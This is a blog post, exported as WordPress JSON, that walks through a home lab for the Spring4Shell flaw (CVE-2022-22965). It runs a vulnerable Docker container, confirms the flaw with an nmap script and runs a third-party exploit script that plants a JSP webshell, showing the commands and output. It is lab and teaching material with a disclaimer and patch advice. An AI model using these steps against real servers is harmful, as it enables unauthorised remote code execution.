{"id":1246,"date":"2022-04-13T23:45:19","date_gmt":"2022-04-13T15:45:19","guid":{"rendered":"\/?p=1246"},"modified":"2022-04-13T23:45:19","modified_gmt":"2022-04-13T15:45:19","slug":"setting-up-a-spring4shell-lab-cve-2022-22965","status":"publish","type":"post","link":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","title":{"rendered":"Setting up a Spring4Shell Lab CVE-2022-22965"},"content":{"rendered":"<p>As described by the <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-22965\" rel=\"noopener\" target=\"_blank\">Mitre CVE Database<\/a> &#8211; A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. Spring4Shell has affected a wide variety of vendors products including Cisco, VMware, Fortinet etc.<\/p>\n<p>OK so lets get to labbing this one!<br \/>\n<strong>Disclaimer &#8211; never test on a production network. Always have permission. The following method is for a LAB environment only.<\/strong><\/p>\n<p><strong>Prerequisites:<\/strong><br \/>\nYou will need a Linux VM capable of running Docker. Im using Ubuntu 20.x. Host IP for this example is 10.1.1.1\/24<br \/>\nA secondary host to run the nmap scan (can be any OS as long as it supports nmap and the scripting engine). IP for my nmap host is 10.1.1.10\/24<\/p>\n<p><strong>Method<\/strong><br \/>\n1. Install docker on your Ubuntu VM and run the Spring4Shell container pre made by <a href=\"https:\/\/github.com\/reznok\/Spring4Shell-POC\" rel=\"noopener\" target=\"_blank\">reznok <\/a>on Github:<br \/>\n<code>sudo apt install docker.io<br \/>\nsudo docker build . -t spring4shell && sudo docker run -p 8080:8080 spring4shell<\/code><br \/>\nApp will now be available at http:\/\/10.1.1.1:8080\/helloworld\/greeting<\/p>\n<p>2. Clone the Spring4Shell NSE from gpiechnik2 on <a href=\"https:\/\/github.com\/gpiechnik2\/nmap-spring4shell\" rel=\"noopener\" target=\"_blank\">Github<\/a><br \/>\nSave it to your scanning host. In this example I used Windows. Run it against the target to confirm the vulnerability:<br \/>\n<code>Spring4Shell>nmap -v -sS --script=spring4shell.nse 10.1.1.1<br \/>\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2022-04-13 23:08 W. Australia Standard Time<br \/>\nInitiating NSE at 23:08<br \/>\nCompleted NSE at 23:08, 0.00s elapsed<br \/>\nScanning 10.1.1.1 [1 port]\nInitiating SYN Stealth Scan at 23:08<br \/>\nScanning 10.1.1.1 [1000 ports]\nDiscovered open port 8080\/tcp on 10.1.1.1<br \/>\nDiscovered open port 22\/tcp on 10.1.1.1<br \/>\nCompleted SYN Stealth Scan at 23:08, 0.07s elapsed (1000 total ports)<br \/>\nNSE: Script scanning 10.1.1.1<br \/>\nInitiating NSE at 23:08<br \/>\nCompleted NSE at 23:08, 4.13s elapsed<br \/>\nNmap scan report for 10.1.1.1<br \/>\nHost is up (0.00036s latency).<br \/>\nNot shown: 998 closed tcp ports (reset)<br \/>\nPORT     STATE SERVICE<br \/>\n22\/tcp   open  ssh<br \/>\n8080\/tcp open  http-proxy<br \/>\n| spring4shell:<br \/>\n|   VULNERABLE:<br \/>\n|   Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+<br \/>\n|     State: VULNERABLE<br \/>\n|     IDs:  CVE:CVE-2022-22965<br \/>\n|     Check results:<br \/>\n|       10.1.1.1:8080\/shell.jsp?pwd=j&cmd=id<br \/>\n|     Extra information:<br \/>\n|       TESTED URL: 10.1.1.1:8080<br \/>\n|       PATH:<br \/>\n|       COMMAND: id<br \/>\n|       ASSERTION: uid<br \/>\n|     References:<br \/>\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-22965<br \/>\nMAC Address: 00:0C:29:5C:08:93 (VMware)<\/code><br \/>\nOK confirmed the host is vulnerable. Lets move on to the exploit.<\/p>\n<p>3. Save the exploit.py to your scanning host and execute with python (you may need to install python3 and pip the requests module):<br \/>\n<code>C:\\Spring4Shell>python .\\exploit.py --url http:\/\/10.1.1.1:8080\/helloworld\/greeting --file shell<br \/>\n[*] Resetting Log Variables.<br \/>\n[*] Response code: 200<br \/>\n[*] Modifying Log Configurations<br \/>\n[*] Response code: 200<br \/>\n[*] Response Code: 200<br \/>\n[*] Resetting Log Variables.<br \/>\n[*] Response code: 200<br \/>\n[+] Exploit completed<br \/>\n[+] Check your target for a shell<br \/>\n[+] File: shell.jsp<br \/>\n[+] Shell should be at: http:\/\/10.1.1.1:8080\/shell.jsp?cmd=id<\/code><\/p>\n<p>4. Test the webshell in a browser. Use unicode for spaces (%20) etc:<br \/>\n<a href=\"\/wp-content\/uploads\/2022\/04\/Spring4Shell-1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.insecurewi.re\/wp-content\/themes\/breek\/assets\/images\/transparent.gif\" data-lazy=\"true\" data-src=\"\/wp-content\/uploads\/2022\/04\/Spring4Shell-1.png\" alt=\"Spring4Shell 1\" width=\"629\" height=\"155\" class=\"aligncenter size-full wp-image-1249\" data-srcset=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/Spring4Shell-1.png 629w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/Spring4Shell-1-300x74.png 300w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/Spring4Shell-1-100x25.png 100w\" data-sizes=\"auto, (max-width: 629px) 100vw, 629px\" \/><\/a><br \/>\n<a href=\"\/wp-content\/uploads\/2022\/04\/Spring4Shell-2.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.insecurewi.re\/wp-content\/themes\/breek\/assets\/images\/transparent.gif\" data-lazy=\"true\" data-src=\"\/wp-content\/uploads\/2022\/04\/Spring4Shell-2.png\" alt=\"Spring4Shell 2\" width=\"955\" height=\"144\" class=\"aligncenter size-full wp-image-1250\" data-srcset=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/Spring4Shell-2.png 955w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/Spring4Shell-2-300x45.png 300w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/Spring4Shell-2-768x116.png 768w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/Spring4Shell-2-100x15.png 100w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/Spring4Shell-2-950x144.png 950w, https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/Spring4Shell-2-700x106.png 700w\" data-sizes=\"auto, (max-width: 955px) 100vw, 955px\" \/><\/a><br \/>\nProfit.<\/p>\n<p><strong>Mitigation<\/strong><br \/>\nPatch!<br \/>\nCheck the notes on the Spring Framework website <a href=\"https:\/\/spring.io\/blog\/2022\/03\/31\/spring-framework-rce-early-announcement\" rel=\"noopener\" target=\"_blank\">here<\/a>.<br \/>\nSpring4Shell was patched quickly due to the RCE nature of the vulnerability. Vendors that use the Spring Framework have released their own patches.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As described by the Mitre CVE Database &#8211; A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code&#8230;<\/p>\n","protected":false},"author":2,"featured_media":1251,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,10],"tags":[85,166],"class_list":["post-1246","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-attack","category-security","tag-cve-2022-22965","tag-spring4shell"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire\" \/>\n<meta property=\"og:description\" content=\"As described by the Mitre CVE Database &#8211; A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\" \/>\n<meta property=\"og:site_name\" content=\"Insecure Wire\" \/>\n<meta property=\"article:published_time\" content=\"2022-04-13T15:45:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"627\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"nikonau\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/insecurewire\" \/>\n<meta name=\"twitter:site\" content=\"@insecurewire\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nikonau\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\"},\"author\":{\"name\":\"nikonau\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\"},\"headline\":\"Setting up a Spring4Shell Lab CVE-2022-22965\",\"datePublished\":\"2022-04-13T15:45:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\"},\"wordCount\":323,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\",\"keywords\":[\"CVE-2022-22965\",\"Spring4Shell\"],\"articleSection\":[\"Attack\",\"Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\",\"url\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\",\"name\":\"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\",\"datePublished\":\"2022-04-13T15:45:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\",\"width\":1200,\"height\":627,\"caption\":\"spring4shell\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.insecurewi.re\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Setting up a Spring4Shell Lab CVE-2022-22965\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.insecurewi.re\/#website\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"name\":\"Insecure Wire\",\"description\":\"A Network Engineer\u2019s Perspective.\",\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.insecurewi.re\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.insecurewi.re\/#organization\",\"name\":\"Insecure Wire\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"width\":32,\"height\":32,\"caption\":\"Insecure Wire\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/insecurewire\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\",\"name\":\"nikonau\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"caption\":\"nikonau\"},\"sameAs\":[\"https:\/\/x.com\/https:\/\/twitter.com\/insecurewire\"],\"url\":\"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","og_locale":"en_US","og_type":"article","og_title":"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire","og_description":"As described by the Mitre CVE Database &#8211; A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code...","og_url":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","og_site_name":"Insecure Wire","article_published_time":"2022-04-13T15:45:19+00:00","og_image":[{"width":1200,"height":627,"url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","type":"image\/jpeg"}],"author":"nikonau","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/insecurewire","twitter_site":"@insecurewire","twitter_misc":{"Written by":"nikonau","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#article","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/"},"author":{"name":"nikonau","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d"},"headline":"Setting up a Spring4Shell Lab CVE-2022-22965","datePublished":"2022-04-13T15:45:19+00:00","mainEntityOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/"},"wordCount":323,"commentCount":0,"publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","keywords":["CVE-2022-22965","Spring4Shell"],"articleSection":["Attack","Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","url":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","name":"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","datePublished":"2022-04-13T15:45:19+00:00","breadcrumb":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","width":1200,"height":627,"caption":"spring4shell"},{"@type":"BreadcrumbList","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.insecurewi.re\/"},{"@type":"ListItem","position":2,"name":"Setting up a Spring4Shell Lab CVE-2022-22965"}]},{"@type":"WebSite","@id":"https:\/\/www.insecurewi.re\/#website","url":"https:\/\/www.insecurewi.re\/","name":"Insecure Wire","description":"A Network Engineer\u2019s Perspective.","publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.insecurewi.re\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.insecurewi.re\/#organization","name":"Insecure Wire","url":"https:\/\/www.insecurewi.re\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","width":32,"height":32,"caption":"Insecure Wire"},"image":{"@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/insecurewire"]},{"@type":"Person","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d","name":"nikonau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","caption":"nikonau"},"sameAs":["https:\/\/x.com\/https:\/\/twitter.com\/insecurewire"],"url":"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/"}]}},"_links":{"self":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1246","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/comments?post=1246"}],"version-history":[{"count":0,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1246\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media\/1251"}],"wp:attachment":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media?parent=1246"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/categories?post=1246"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/tags?post=1246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}